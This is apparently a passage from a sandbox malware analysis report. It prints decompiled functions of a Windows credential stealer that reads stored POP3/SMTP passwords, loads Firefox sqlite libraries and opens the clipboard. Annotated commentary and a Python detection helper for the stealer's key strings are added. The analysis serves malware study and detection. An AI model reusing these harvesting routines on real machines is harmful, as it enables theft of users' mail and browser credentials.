                                                    • Part of subcall function 0040EA26: _itoa.MSVCRT ref: 0040EA5B
                                                    • Part of subcall function 0040EA26: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040EA6A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                  • String ID:
                                                  • API String ID: 4165544737-0
                                                  • Opcode ID: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                  • Instruction ID: f55a197cdd86fa31c53d12907dd8f70643f2484b8232c3448506387801693677
                                                  • Opcode Fuzzy Hash: 41fbf1d09f89329d89d85b9c1c83700b09fa1e2b362e37a4bb4b326ca53279f5
                                                  • Instruction Fuzzy Hash: F2E0B632000109FBCF125F95EC01AAA7F76FF08314F148869FD5855161D332A570EF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004047F1(void* __eax) {
                                                  				struct HINSTANCE__* _t5;
                                                  				signed int* _t7;
                                                  
                                                  				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
                                                  				_t7 = __eax + 0x200;
                                                  				_t5 =  *_t7;
                                                  				if(_t5 != 0) {
                                                  					_t5 = FreeLibrary(_t5); // executed
                                                  					 *_t7 =  *_t7 & 0x00000000;
                                                  				}
                                                  				return _t5;
                                                  			}

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                  • Instruction ID: 9a892a7b4d94419058e15305363ecf1fbcdc16662e35282e5c511663eadef616
                                                  • Opcode Fuzzy Hash: 44cb22c5a6e339dc322f31723d6313ec8e4e2f7ef4db3de4f35608b5b7650eec
                                                  • Instruction Fuzzy Hash: 90D012721003118FD7705F14EC0CBE133E8AF40312F2584B8EA55E7155C3749584CA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405EE4(CHAR* _a4) {
                                                  				void* _t3;
                                                  
                                                  				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                  				return _t3;
                                                  			}

                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                  • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                  • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                  • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040E894(void* __esi) {
                                                  				struct HINSTANCE__* _t6;
                                                  				int _t7;
                                                  
                                                  				_t6 =  *(__esi + 8);
                                                  				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
                                                  				if(_t6 != 0) {
                                                  					_t7 = FreeLibrary(_t6); // executed
                                                  					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
                                                  					return _t7;
                                                  				}
                                                  				return _t6;
                                                  			}

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                  • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                  • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                  • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {
                                                  
                                                  				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
                                                  				return 1;
                                                  			}

                                                  APIs
                                                  • EnumResourceNamesA.KERNEL32 ref: 0040EDA0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                  • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                  • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                  • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406F5B(signed int* __esi) {
                                                  				int _t2;
                                                  				void* _t3;
                                                  
                                                  				_t3 =  *__esi;
                                                  				if(_t3 != 0xffffffff) {
                                                  					_t2 = FindClose(_t3); // executed
                                                  					 *__esi =  *__esi | 0xffffffff;
                                                  					return _t2;
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                  • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                  • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                  • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040614B(CHAR* _a4) {
                                                  				long _t4;
                                                  
                                                  				_t4 = GetFileAttributesA(_a4); // executed
                                                  				return 0 | _t4 != 0xffffffff;
                                                  			}

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                  • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                  • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                  • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040EB3F(void* _a4, char* _a8, void** _a12) {
                                                  				long _t4;
                                                  
                                                  				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
                                                  				return _t4;
                                                  			}

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                  • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                  • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                  • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 100%
                                                  			E0040F64B(intOrPtr* __esi, char* _a4) {
                                                  				void _v283;
                                                  				char _v284;
                                                  				void _v547;
                                                  				char _v548;
                                                  				struct HINSTANCE__* _t45;
                                                  				struct HINSTANCE__* _t46;
                                                  				struct HINSTANCE__* _t57;
                                                  				struct HINSTANCE__* _t68;
                                                  				CHAR* _t79;
                                                  				intOrPtr* _t81;
                                                  
                                                  				_t81 = __esi;
                                                  				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
                                                  					L14:
                                                  					return 1;
                                                  				}
                                                  				_v284 = 0;
                                                  				memset( &_v283, 0, 0x117);
                                                  				if(_a4 == 0) {
                                                  					E0040F435( &_v284);
                                                  				} else {
                                                  					strcpy( &_v284, _a4);
                                                  				}
                                                  				if(_v284 == 0) {
                                                  					_t79 = "sqlite3.dll";
                                                  					_t45 = GetModuleHandleA(_t79);
                                                  					 *(_t81 + 0x24) = _t45;
                                                  					if(_t45 != 0) {
                                                  						goto L12;
                                                  					}
                                                  					_t57 = LoadLibraryA(_t79);
                                                  					goto L11;
                                                  				} else {
                                                  					_v548 = 0;
                                                  					memset( &_v547, 0, 0x104);
                                                  					strcpy( &_v548,  &_v284);
                                                  					strcat( &_v284, "\\sqlite3.dll");
                                                  					if(E0040614B( &_v284) == 0) {
                                                  						strcpy( &_v284,  &_v548);
                                                  						strcat( &_v284, "\\mozsqlite3.dll");
                                                  					}
                                                  					_t68 = GetModuleHandleA( &_v284);
                                                  					 *(_t81 + 0x24) = _t68;
                                                  					if(_t68 != 0) {
                                                  						L12:
                                                  						_t46 =  *(_t81 + 0x24);
                                                  						if(_t46 == 0) {
                                                  							return 0;
                                                  						}
                                                  						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
                                                  						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
                                                  						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
                                                  						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
                                                  						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
                                                  						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
                                                  						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
                                                  						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
                                                  						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
                                                  						goto L14;
                                                  					} else {
                                                  						_t57 = LoadLibraryExA( &_v284, 0, 8);
                                                  						L11:
                                                  						 *(_t81 + 0x24) = _t57;
                                                  						goto L12;
                                                  					}
                                                  				}
			}

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F674
                                                  • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                  • memset.MSVCRT ref: 0040F6B8
                                                  • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                  • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                  • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                  • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                  • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                  • API String ID: 3567885941-2042458128
                                                  • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                  • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                  • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                  • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
                                                  				signed int _v8;
                                                  				char _v20;
                                                  				char _v24;
                                                  				char _v152;
                                                  				char _v280;
                                                  				char _v408;
                                                  				intOrPtr _v412;
                                                  				char _v668;
                                                  				char _v796;
                                                  				intOrPtr _v800;
                                                  				char _v928;
                                                  				char _v940;
                                                  				char _v952;
                                                  				char _v956;
                                                  				char _v1084;
                                                  				char _v1212;
                                                  				char _v1340;
                                                  				intOrPtr _v1344;
                                                  				char _v1600;
                                                  				char _v1728;
                                                  				intOrPtr _v1732;
                                                  				char _v1860;
                                                  				char _v1872;
                                                  				void* _t59;
                                                  				signed int _t60;
                                                  				intOrPtr _t63;
                                                  				void* _t113;
                                                  				void* _t118;
                                                  				void* _t122;
                                                  				char* _t123;
                                                  				void* _t141;
                                                  
                                                  				_t141 = __fp0;
                                                  				_t118 = __edi;
                                                  				_t113 = __ecx;
                                                  				_t59 = E0040EB3F(_a4, _a8,  &_a8);
                                                  				if(_t59 == 0) {
                                                  					_t60 = 0x7d;
                                                  					_a4 = _t60;
                                                  					_v8 = _t60;
                                                  					E004021D8( &_v1872);
                                                  					E004021D8( &_v940);
                                                  					_t63 = 2;
                                                  					_v1732 = _t63;
                                                  					_v800 = _t63;
                                                  					_push( &_v928);
                                                  					_push("DisplayName");
                                                  					_push(_a8);
                                                  					_v1344 = 4;
                                                  					_t122 = 0x7f;
                                                  					_v412 = 1;
                                                  					E0040EB80(_t122, _t113);
                                                  					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
                                                  					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
                                                  					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
                                                  					E0040EB59(_t113, _a8, "PopPort",  &_v24);
                                                  					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
                                                  					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
                                                  						_a4 = _a4 & 0x00000000;
                                                  					}
                                                  					strcpy( &_v1860,  &_v928);
                                                  					strcpy( &_v1728,  &_v796);
                                                  					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
                                                  					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
                                                  					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
                                                  					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
                                                  					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
                                                  						_v8 = _v8 & 0x00000000;
                                                  					}
                                                  					_t123 = _t118 + 0xa9c;
                                                  					strcpy( &_v152, _t123);
                                                  					strcpy( &_v1084, _t123);
                                                  					_t116 = _a4;
                                                  					if(_a4 > 0) {
                                                  						E00401D18( &_v280, _t116);
                                                  					}
                                                  					if(_v408 != 0) {
                                                  						E00402407( &_v940, _t141, _t118);
                                                  					}
                                                  					_t117 = _v8;
                                                  					if(_v8 > 0) {
                                                  						E00401D18( &_v1212, _t117);
                                                  					}
                                                  					if(_v1340 != 0) {
                                                  						E00402407( &_v1872, _t141, _t118);
                                                  					}
                                                  					return RegCloseKey(_a8);
                                                  				}
                                                  				return _t59;
			}

                                                  APIs
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                    • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                    • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                  • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                  • strcpy.MSVCRT(?,?), ref: 00402F51
                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$QueryValue$CloseOpen
                                                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                  • API String ID: 4127491968-1534328989
                                                  • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                  • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                  • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                  • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040AC8A(void* __eax, void* __ebx) {
                                                  				char _v264;
                                                  				char _v524;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t13;
                                                  				void* _t18;
                                                  				int _t19;
                                                  				long _t20;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  
                                                  				_t27 = __ebx;
                                                  				_t31 = __eax;
                                                  				_t13 = GetTempPathA(0x104,  &_v524);
                                                  				_t32 = _t13;
                                                  				if(_t13 == 0) {
                                                  					GetWindowsDirectoryA( &_v524, 0x104);
                                                  				}
                                                  				_v264 = 0;
                                                  				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                  				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
                                                  				if(_t18 != 0) {
                                                  					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                  					_t34 = _t19;
                                                  					if(_t19 == 0) {
                                                  						_t20 = GetLastError();
                                                  					} else {
                                                  						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
                                                  					}
                                                  					if(_t20 != 0) {
                                                  						E00405F41(_t20,  *(_t31 + 0x108));
                                                  					}
                                                  					return DeleteFileA( &_v264);
                                                  				}
                                                  				return _t18;
			}

                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                  • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                  • OpenClipboard.USER32(?), ref: 0040ACF8
                                                  • GetLastError.KERNEL32 ref: 0040AD11
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                  • String ID:
                                                  • API String ID: 2014771361-0
                                                  • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                  • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                  • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                  • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Mail-client credential harvester. Six keys are read through E00403397,
			// which presumably wraps GetPrivateProfileString (the API ID below), into
			// two records of identical layout, 932 bytes apart on the stack:
			//   SMTP record at _v936 : server _v664,  user _v404,  password _v276
			//   POP3 record at _v1868: server _v1596, user _v1336, password _v1208
			// A record is only passed on to E004033B8 / E00402407 when its password
			// field is non-empty, i.e. only credentials that are actually stored leak.
			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;      // ESMTPPassword
				char _v404;      // ESMTPUsername
				intOrPtr _v408;
				char _v664;      // SMTPServer
				intOrPtr _v796;
				char _v936;      // start of the SMTP record
				char _v1208;     // POP3Password
				char _v1336;     // POP3Username
				intOrPtr _v1340;
				char _v1596;     // POP3Server
				intOrPtr _v1728;
				char _v1868;     // start of the POP3 record
				void* __esi;
				intOrPtr _t23;
				void* _t35;
				void* _t48;      // copy of __fp0 for the second E00402407 call (missing from the raw decompiler output)

				_t48 = __fp0;
				E004021D8( &_v936);     // initialise both records
				E004021D8( &_v1868);
				_t23 = 4;
				_v796 = _t23;           // field +140 is 4 in both records
				_v1728 = _t23;
				_v408 = _t23;           // field +528 differs (4 vs 1), presumably the protocol tag
				_v1340 = 1;
				E00403397(__edi, "SMTPServer",  &_v664);
				E00403397(__edi, "ESMTPUsername",  &_v404);
				E00403397(__edi, "ESMTPPassword",  &_v276);
				E00403397(__edi, "POP3Server",  &_v1596);
				E00403397(__edi, "POP3Username",  &_v1336);
				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {                            // an SMTP password was found
					E004033B8( &_v276);                     // transforms the password in place (body not shown here)
					_t35 = E00402407( &_v936, __fp0, _a4);  // hands the record to the collector
				}
				if(_v1208 != 0) {                           // a POP3 password was found
					E004033B8( &_v1208);
					return E00402407( &_v1868, _t48, _a4);
				}
				return _t35;
			}

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                  • API String ID: 3963849919-1658304561
                                                  • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                  • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                  • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                  • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
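The fingerprint of E004033D7 is the set of six INI key names it reads back-to-back (the String ID above). The following triage helper is an added example, not code from the sample or from this report: it scans a raw memory image for those names as NUL-terminated ANSI strings and reports the tightest span that holds all six. In a harvester they sit packed in one function's string pool; in a legitimate mail client they tend to be scattered. The images are constructed for the example and the window size is a tuning choice, not a value from the report.

```python
"""Triage helper for the credential-harvesting routine E004033D7.

Added example; not code from the sample or the sandbox report. The sample
image below is constructed here and the window size is an assumption.
"""
import re

# The six keys E004033D7 passes to GetPrivateProfileString, in call order.
MAIL_INI_KEYS = (b"SMTPServer", b"ESMTPUsername", b"ESMTPPassword",
                 b"POP3Server", b"POP3Username", b"POP3Password")


def find_key_cluster(image: bytes, window: int = 0x200):
    """Return (start, end) of the smallest byte span no wider than `window`
    that contains every key name as a NUL-terminated string, or None when the
    set is incomplete or too spread out."""
    hits = sorted((m.start(), key) for key in MAIL_INI_KEYS
                  for m in re.finditer(re.escape(key) + b"\x00", image))
    best = None
    for i, (start, _) in enumerate(hits):
        seen = set()
        for off, key in hits[i:]:          # grow the window from this hit
            if off - start > window:
                break
            seen.add(key)
            if len(seen) == len(MAIL_INI_KEYS):
                span = (start, off + len(key) + 1)
                if best is None or span[1] - span[0] < best[1] - best[0]:
                    best = span
                break
    return best


# Constructed images: a packed string pool (harvester-like) and a scattered
# one, where each key sits 0x400 bytes of filler away from the next.
PACKED = b"\x00" * 0x40 + b"\x00".join(MAIL_INI_KEYS) + b"\x00" + b"\x00" * 0x40
SCATTERED = b"\x00".join(k + b"\x00" + b"\x90" * 0x400 for k in MAIL_INI_KEYS)

if __name__ == "__main__":
    print(find_key_cluster(PACKED))      # (64, 140)
    print(find_key_cluster(SCATTERED))   # None
```

The same condition ports directly to a YARA rule with the six strings and `all of them`; the window check is what keeps a mail client that merely knows these key names from matching.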

C-Code - Quality: 100%
			// Lazily fills a global OSVERSIONINFOA at 0x417118 and returns it.
			// 0x41711c is the dwMajorVersion field (offset +4); zero means the
			// structure has not been populated yet. 0x94 is sizeof(OSVERSIONINFOA).
			E00406278() {

				if( *0x41711c == 0) {
					0x417118->dwOSVersionInfoSize = 0x94;
					GetVersionExA(0x417118);
				}
				return 0x417118;
			}

                                                  APIs
                                                  • GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                  Memory Dump Source
